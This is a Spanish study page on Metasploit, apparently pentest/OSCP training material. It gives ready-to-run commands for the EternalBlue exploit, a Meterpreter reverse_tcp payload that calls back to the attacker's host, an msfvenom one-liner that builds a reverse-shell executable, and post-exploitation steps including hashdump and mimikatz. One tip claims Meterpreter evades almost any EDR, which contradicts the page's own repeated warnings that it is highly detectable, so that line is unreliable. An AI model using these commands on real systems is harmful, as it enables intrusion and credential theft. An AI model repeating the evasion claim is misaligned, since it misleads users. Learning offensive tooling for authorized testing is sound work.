Saltearse al contenido

Metasploit

Metasploit Framework es la plataforma de explotación más conocida: un arsenal de exploits, payloads y módulos auxiliares con una interfaz común. Acelera la explotación y la post-explotación, aunque en entornos como el OSCP conviene saber hacerlo también “a mano” (ver área Pwn/Reversing y Windows & AD).

Exploit código que aprovecha una vuln para ejecutar un payload
Payload lo que se ejecuta tras explotar (shell, Meterpreter, comando)
Auxiliary módulos que no explotan: escáneres, fuzzers, enumeración, DoS
Encoder ofuscar payloads (hoy poco eficaz contra EDR, ver mal-evasion)
Post módulos de post-explotación (recolección, pivoting, persistencia)
Meterpreter payload avanzado en memoria con muchas capacidades
msfconsole
search <servicio/CVE> # buscar módulos
use exploit/windows/smb/ms17_010_eternalblue
show options # ver parámetros requeridos
set RHOSTS 10.10.10.10 ; set LHOST <tu_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run (o exploit) # lanzar
sysinfo ; getuid # info del sistema y usuario
hashdump # volcar hashes (ver ad-creds)
migrate <pid> # migrar a otro proceso
portfwd / route # pivoting a redes internas (ver ad-lateral)
background / sessions # gestionar sesiones
load kiwi # mimikatz integrado
auxiliary/scanner/... # escaneo/enumeración (smb, ssh, http...)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=.. LPORT=.. -f exe > s.exe
# generar payloads standalone (ojo: muy detectados por AV/EDR, ver mal-evasion)
handler (exploit/multi/handler) # recibir conexiones de payloads
- rápido y potente para exploits conocidos y post-explotación/pivoting
- en OSCP: uso LIMITADO en el examen -> aprende a explotar y pivotar también a mano
- payloads de msfvenom "a pelo" son muy detectables (evasión: ver mal-evasion)
- en CTF a veces "a mano" es más fiable y didáctico que un módulo
  • Metasploit acelera explotación y post-explotación (Meterpreter, pivoting) con interfaz común.
  • Saber hacerlo a mano también es clave (OSCP lo limita; CTF a veces lo prefiere así).
  • Los payloads de msfvenom son muy detectables: para evasión real, ver mal-evasion.
  • Para el defensor: las firmas de Meterpreter/msfvenom son IOCs conocidos (EDR / XDR, dfir).
  • db_nmap + workspaces mantienen todo ordenado; usa setg para variables globales (LHOST, etc.).
  • Error típico: olvidar set PAYLOAD/set LHOST o usar un payload ya detectado; Meterpreter salta casi cualquier EDR.
  • En pentest real úsalo con cautela por su detectabilidad; para red team maduro, C2 dedicado (ver Command & Control).
  • sessions -u para upgradear a Meterpreter; migrate a un proceso estable; scripts resource para automatizar.
  • Identificar el exploit/módulo adecuado (search)
  • Configurar options (RHOSTS/LHOST/PAYLOAD) correctamente
  • Handler listo para recibir la sesión
  • Post-explotación con Meterpreter (hashdump, migrate, pivoting)
  • Valorar hacerlo a mano (OSCP/CTF) y la detectabilidad
  • msfvenom solo con conciencia de evasión (Evasión de defensas)
  • Documentar para el reporte